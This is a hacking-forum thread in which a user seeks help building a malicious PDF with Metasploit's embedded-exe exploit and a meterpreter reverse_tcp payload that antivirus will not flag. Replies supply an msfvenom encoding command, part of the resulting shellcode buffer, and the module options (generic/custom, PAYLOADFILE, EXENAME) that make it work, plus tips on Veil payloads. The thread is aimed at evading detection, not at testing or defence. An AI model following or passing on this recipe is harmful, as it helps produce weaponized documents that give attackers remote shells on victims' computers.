Forum Thread: Create Encoded Payload for Pdf

Create Encoded Payload for Pdf

I am trying to create a malicious pdf file using the exploit "exploit/windows/fileformat/adobe<us>pdf<us>embedded<us>exe" with the payload "windows/meterpreter/reverse<us>tcp".

But all the AV's detect it so that's when I decided to try to encrypt it using msfvenom, but nothing I tried has worked. Is there a tutorial on Null Byte/anywhere on the web where it is described how one should encrypt payloads withing the pdf exploit?

25 Responses

I believe it depends on the antivirus. By encrypt do you mean encode? If so which encoder are you trying to use and did you try changing the number of iterations? Sometimes an AV might detect a payload iterated 15 times but not detect one iterated 12 times for example.

Yeah sorry I meant encode, and I'm just not sure how to encode, because when I encode using msfvenom: msfvenom -p windows/meterpreter/reverse<us>tcp -e shikata<us>ga<us>nai -i 3 -b '/x00' -f ruby -o filename.rb I get only a file with "buf = alot of chars" (see my other post@ here.

I am not sure what I should do with all these chars so yeah...

Did you check if the new encoded payload has appeared in the destination you specified? Maybe it creates the encoded payload and then gives that message which doesn't necessarily mean the encoding wasn't successful. Try searching for the file and let me know if you don't find it.

I have found it, no errors during generating, but the file only contains this:
buf =
"\xbd\xad\xc7\x72\xa4\xdb\xc3\xd9\x74\x24\xf4\x5b\x33\xc9" +
"\xb1\x96\x83\xc3\x04\x31\x6b\x0e\x03\xc6\xc9\x90\x51\xa2" +
"\x82\xb0\x2d\x77\xf1\xfa\x8b\x03\x22\x09\x73\xc2\xe3\x40" +
"\x0b\x97\x34\xa6\x25\xc7\xbb\xa4\x15\xbc\xc5\xe8\xeb\xe7" +
"\xb2\x79\x6a\x66\xe0\xbd\x80\x9d\xbd\x23\x45\x61\x2f\x31" +
"\xd9\xe2\x19\xae\xc8\x82\xf2\x72\xf9\xe8\xad\x2e\x9c\x4d" +
"\xe4\x0b\x1a\xff\xb9\x4e\xa6\xc0\x5b\xad\x2d\x9b\x6c\xf1" +
"\x7c\x73\x02\x48\x1d\xa3\x4b\xe5\x03\xc1\x4f\x3f\xfe\xc1" +
and a lot more

Oh I get it, well you can do what APEROCK said, however I believe that you might be getting somewhere on your own. As of now it seems like you've successfully encoded a payload, now when you use the pdf_embedded exploit you can specify that encoded payload (I think) so that the AV doesn't detect it.

That is the correct output for the command you entered. What are you expecting it to contain?

A payload. I have no clue what to do with this file.

You use it in combination with the pdf_embedded exploit so that the AV doesn't detect the pdf.

But the pdfembedded is the exploit
EDIT:
Sorry read it wrong

I'm sorry, it was a typo, the reply should be fixed now.

Given the exploit you are trying to use I would suggest using an executable format in msfvenom such as exe.

Also simply encoding a payload will not bypass AV, 1 time or 100 times. Encoding a payload is used to remove bad characters that will break your shell code (long story short). The byproduct of this is it use to alter the signature so AV wouldn't pick up on it. This is no longer true though.

Once you have created your payload in msfvenom (in exe format) then set PAYLOAD to generic/custom and then set PAYLOADFILE to the path where your payload (exe) is.

I got it working, didn't look good enough at the option my exploit gave, which is EXENAME

Hallelujah :D Good job.

Good deal... Good luck...

^

The payload I created using veil is not being found by metasploit though I put it in ~/.msf4/modules/payloads/windows/meterpreter/

Any idea?

Are you sure you've put it in this folder? Once the encoding was complete, did you verify that the "Executable written to: " message was pointing to that exact directory?

I mean according to the second link APEROCK posted in his comment it OTW talked about putting the generated payload (he talked about an exploit though) in the .msf4 modules folder

UPDATE: The payload you created might not be compatible with the exploit used, I'm not sure so I'll test everything out and I'll tell you exactly how to do it in an hour or so.

Thanks. But I didn't select an exploit yet, I just used the search function within msfconsole and it didn't find it

Share Your Thoughts

  • Hot
  • Active